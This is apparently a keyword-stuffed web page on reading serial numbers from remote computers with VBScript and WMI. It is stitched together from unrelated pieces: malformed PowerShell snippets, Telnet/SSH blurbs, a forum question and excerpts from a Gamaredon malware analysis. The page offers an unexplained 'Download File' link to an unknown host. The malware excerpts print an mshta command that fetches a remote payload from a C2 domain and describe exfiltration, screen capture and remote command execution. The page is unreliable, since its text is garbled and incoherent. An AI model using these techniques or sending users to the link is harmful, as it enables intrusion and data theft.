The script examples shown in this topic obtain data only from the local computer. For more information about how to use the script to obtain data from remote computers, see Connecting to WMI on a Remote Computer.

Vbscript Get Serial Number From Remote Computer

Download File: https://miimms.com/2vI4NS

The Get-ComputerInfo - Query Computer Info From Local/Remote Computers - (WMI) PowerShell sample on TechNet Gallery uses a number of calls to hardware and software to display information about a local or remote system.

PS C:\Users\itv128> Get-WmiObject win32_bios -computername dnbtd084Get-WmiObject : Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))At line:1 char:1+ Get-WmiObject win32_bios -computername dnbtd084+ + CategoryInfo : NotSpecified: (:) [Get-WmiObject], UnauthorizedAccessException + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

Use this simple script against a csv file to pull serial numbers on remote computers. The script assumes the user have the appropriate level of access on the remote computers in order to query WMI remotely.

$Computerobjects = Import-CSV c:\temp\importdatalist.csvForEach ($computerobject in $computerobjects)write-host $ComputerobjectGet-WmiObject win32_diskdrive -ComputerName $computerobject

Get-ComputerInfo was introduced in PowerShell 5 and provides similar information about your system. You can also read from the registry selected operating system information such as version, build information, release ids, and UBR number.

Once opened, the LNKs will attempt to execute MSHTA.EXE to download and parse a remote XML file to execute a malicious PowerShell script:mshta.exe hxxp://a0704093.xsph[.]ru/bass/grudge.xml /fGamaredon is known to use the domain xsph[.]ru. The servers in this campaign only allow access from IP addresses inside the Ukrainian address space.This PowerShell script decodes and executes a second PowerShell script (instrumentor), which collects data from the victim and reports back to a remote server. This script also allows the remote server to send a PowerShell command or binary blob containing encrypted VBScript (VBS) code to be executed locally:

The instrumentor PowerShell script usually consists of a function that decodes the encrypted response from the command and control (C2) server and executes it as a VBScript object. The key used in the XOR decoder is calculated based on the machine's volume serial number plus index parameters passed in the response blob. This method makes it difficult to decode the malicious content if an observer looking at the data doesn't have both parameters available.The PowerShell script also repeatedly captures the current user's screen. This code uses the "System.Windows.Forms" object to capture a copy of the virtual desktop, including setups with multiple screens. The screen capture is executed nine times, but the resulting screenshot is always saved to "%TEMP%\test.png", which gets overwritten every time. The resulting image (PNG file) is then converted to a base64-encoded string, stored in a variable and the screenshot image file is removed from the disk.The script then proceeds to upload the victim's information to the remote server. The following information is then collected and exfiltrated to a hardcoded C2 URL.

Upon sending the system information, the server response is parsed to see if there are commands to be executed. The entire script runs up to four times, thus up to four different commands can be executed each time.The code checks if the first character is an exclamation point ("!"). If so, the remainder of the response is expected to be a PowerShell code that is passed directly to the command IEX. The output of that command is then added to the variable "cmd" and sent back to the C2 server.If the response starts with any other character, it is treated as an encrypted blob and passed to the decoder function, along with the volume serial number to be decoded and executed as VBScript.

This script uses the same Get-IP() function to get a random IP assigned to the domain and queries a URL constructed from the IP address and a hardcoded extended resource. Just like the previous script, the computer name and volume serial number are used again in communications with the C2 server. The C2 server uses them to encode the next-stage payload subsequently served to the script.If the response from the C2 starts with the string "http", the content is treated as the URL to download the final payload binary. The Volume Serial Number and Computer Name are passed to this URL and the response is decoded using the XorBytes function.

The decrypted binary is then saved to the "%TEMP%" folder with a name consisting of a random string of numbers and the ".exe" file extension and is executed.Alternatively, if the response from the C2 does not begin with the "http" string, the content is treated as a VBS and executed via a COM object.

Avoiding these folders is likely an attempt by the malware to avoid exfiltrating system files thereby focussing on user files of interest only.For each file exfiltrated to the C2, the implant calculates the MD5 hash for the following information and stores it in the "%LocalAppData%\profiles_c.ini" file:The implant also steals files from removable drives connected to the infected endpoint. When the implant finds a removable drive, it looks for files with the file extensions listed earlier. Once a file is found, the implant creates a randomly named folder in the %TEMP% directory and copies the original file from its original location to:%Temp%\\connect\\For example, a user file found in a remote drive "E:" at path "E:\top_secret_docs\isengard.doc" will be copied to"%temp%\randomly_named_folder\connect\\top_secret_docs\isengard.doc"The contents of the folder in the temp directory are subsequently exfiltrated to the C2.

Telnet protocol is mostly used by network admin to access and manage network devices remotely. It helps them access the device by telnetting to the IP address or hostname of a remote device. It allows users to access any application on a remote computer. This helps them to establish a connection to a remote system.

It helps you to log into another computer over a network and allows you to execute commands in a remote machine. You can move files from one machine to another. SSH protocol encrypts traffic in both directions, which helps you to prevent trafficking, sniffing, and password theft.

A serialized product, as installed from a deployment package is uniquely identified by a licensing identifier (LEID). Use the LEID to identify the installed products whose serial numbers you want to query or change. The list of LEIDs is available here.

I have specific situation. I want to get MAC address from a remote computer, which is not in domain. I know the hostname and IP address of the remote computer. The IP Address of my computer is 192.168.2.40 and the remote computer IP is 192.168.2.41.

The serial number and hostname of the victim's computer are some of the first pieces of information the VBA collects. They are converted to hexadecimal and included in the reverse shell HTTP request to identify both the implant and the victim. Figure 10 shows off the configuration of the URI request within the macro and Figure 11 represents an example URI.

Dynamic DNS enables adversaries to rapidly provision very large numbers of records that map back to their infrastructure, creating a confusion layer between victims and adversaries. Gamaredon Group exclusively used Dynamic DNS locations for remotely hosted templates, rotating domains consistently, and leveraging separate infrastructure for hosting stagers and templates.

Spearphishing attachments that utilize template injection may bypass security controls because they contain no embedded VBA code. The attached document retrieves a remotely hosted template where the malicious VBA code resides. In order to detect this activity dynamically, analyze DNS and network traffic over common protocols (HTTP/HTTPS/SMB) and processes generated by Microsoft Office applications. Enterprise defenders may need to whitelist any legitimate use of remotely hosted templates, or any benign network activity to Microsoft infrastructure. Below is an example EQL query focused on new process creation events from Office products that also made DNS requests outside our whitelist.

Just a small addition: Lenovo is a bit tricky with their BIOS information, so the Model field only shows the alphanumeric model number (something like 20F9003SUK). To see the full product name you need to gather either the SystemFamily value from ComputerSystem or the Version value from ComputerSystemProduct (which for the model number I mentioned before is ThinkPad T460s) 2ff7e9595c